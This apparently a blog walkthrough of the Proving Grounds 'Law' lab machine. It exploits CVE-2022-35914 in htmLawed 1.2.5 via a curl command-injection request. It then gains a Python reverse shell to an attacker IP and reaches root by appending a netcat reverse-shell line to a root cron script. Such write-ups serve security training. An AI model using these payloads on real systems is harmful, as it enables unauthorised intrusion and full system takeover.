In this walk through, we will be going through the Law room from Proving Grounds. This room is rated as Intermediate on the platform and it consist of exploitation of CVE-2022-35914 in HTMLawed 1.2.5 to get the initial access. For Privilege escalation, abuse of a cron job via a bash script file is required to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Law |
IPaddress | 192.168.197.190 |
Difficulty | Intermediate |
OS | Linux |
Description | Law is an Intermediate Linux machine which is vulnerable to CVE-2022-35914 that leads to the intial foothold on the server. The privilege escalation abuses a cron job to get root via a bash script file. |
Enumeration:
- I started off with a regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 80 (HTTP).
$ sudo nmap -A 192.168.197.190 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-01 23:16 IST Nmap scan report for 192.168.197.190 Host is up (0.24s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:8.4p1: | PRION:CVE-2016-20012 5.0 https://vulners.com/prion/PRION:CVE-2016-20012 | PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041 | CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 | CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 | PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012 | PRION:CVE-2021-41617 3.5 https://vulners.com/prion/PRION:CVE-2021-41617 | PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368 |_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-server-header: Apache/2.4.56 (Debian) |_http-title: htmLawed (1.2.5) test | vulners: | cpe:/a:apache:http_server:2.4.56: | OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122 | OSV:BIT-APACHE-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-45802 | OSV:BIT-APACHE-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-43622 | OSV:BIT-APACHE-2023-31122 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-31122 | OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802 | OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622 | F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT* | E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT* | DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT* | CVE-2023-43622 5.0 https://vulners.com/cve/CVE-2023-43622 | CVE-2023-31122 5.0 https://vulners.com/cve/CVE-2023-31122 | CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320 | C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT* | BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT* | B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT* | A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT* | 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT* | 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT* | 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT* |_ CVE-2023-45802 2.6 https://vulners.com/cve/CVE-2023-45802 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=2/1%OT=22%CT=1%CU=30749%PV=Y%DS=4%DC=T%G=Y%TM=65BBD93A OS:%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M5 OS:4EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O OS:6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D OS:F=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0 OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=CDE OS:8%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 3306/tcp) HOP RTT ADDRESS 1 245.87 ms 192.168.45.1 2 245.83 ms 192.168.45.254 3 245.92 ms 192.168.251.1 4 246.02 ms 192.168.197.190 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.97 seconds
- Enumerated the web server running on port 80 reveals that the HTMLawed 1.2.5 application is running on that.
Initial Access:
CVE-2022-35914
- Looked for any known exploits for the concerned version online. Found out that it is vulnerable to CVE-2022-35914 which can be used to get code execution on the target. I used the below exploit code in the Burpsuite intercepted request in order to execute commands on the target.
Exploit: https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/POC_2022-35914.sh
curl -s -d 'sid=foo&hhook=exec&text=id' -b 'sid=foo' http://192.168.197.190/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
- Next, we will encode the below python reverse shell one liner and add it to our exploit code payload. Once the request is executed on the target, we will receive a connection back at our netcat listener.
python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",4444));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
sid=qaj8hc4pg37qu5e97m3i5r0p7l&hhook=exec&text=python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",80));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Captured the local flag.
Privilege Escalation:
- Next, i found out a bash script in my current working folder. Seems like it got executed by root at certain intervals.
- So, i added the below command in the script that will use the netcat binary to connect to my listener at 4444 if it gets executed. Hopefully, getting the shell as root.
echo 'nc 192.168.45.214 4444 -e /bin/bash' >> cleanup.sh
- The same happened and at last captured the root flag to mark the machine as complete.
Also Read: PG – Jacko
Conclusion:
So that was “Law” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Enumerated the webserver on port 80 and found HTMLawed 1.2.5 application running. Looked online for any known exploit and found out that it is vulnerable to CVE-2022-35914. So, used the same to get initial foothold on the target. For Privilege escalation, abused a cron job that is running as root by adding a reverse shell one-liner in the scheduled bash script sile, which eventually gave us root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.